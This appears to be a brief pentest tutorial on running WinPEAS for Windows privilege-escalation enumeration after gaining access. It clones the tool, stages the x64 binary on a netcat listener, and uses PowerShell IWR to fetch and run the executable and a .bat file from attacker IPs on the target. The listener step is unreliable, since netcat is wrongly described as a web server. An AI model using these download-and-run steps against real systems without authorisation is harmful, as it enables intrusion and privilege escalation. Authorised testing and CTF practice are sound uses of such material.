WinPEAS – Windows Enum
WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. This writing is about how to run it, and, complete Post-Exploitation activities
How to
1. Download the script from GitHub (https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)
git clone https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite.git
cd privilege-escalation-awesome-scripts-suite
2. Navigate through the directories to find the binary files
cd winPEAS/winPEASexe/binaries/
ls
3. Depending on the type of machine you need to use x64 or x86, This demo will be used on a x64 machine, so, I choose that one
cd x64/Release
ls
4. There we have our executable script winPEASx64.exe. We now need to find a way to move it to our target machine and execute it
5. We will start a web server at the binary location
nc -lvp 9999
6. From the remote server I will use Powershell (IWR), you can also use cmd (certutil)
cd C:\Windows\Temp
IWR http://10.10.14.10:9999/winPEASx64.exe -OutFile winPEASx64.exe
dir
7. Now that it is in the server, execute it
.\winPEASx64.exe
8. Now you can start inspecting the data
Extra
1. Sometimes it is better to try .bat file if the .exe is failing
powershell.exe IWR http://192.168.0.12:9999/winPEAS.bat -OutFile winPEAS.bat
dir
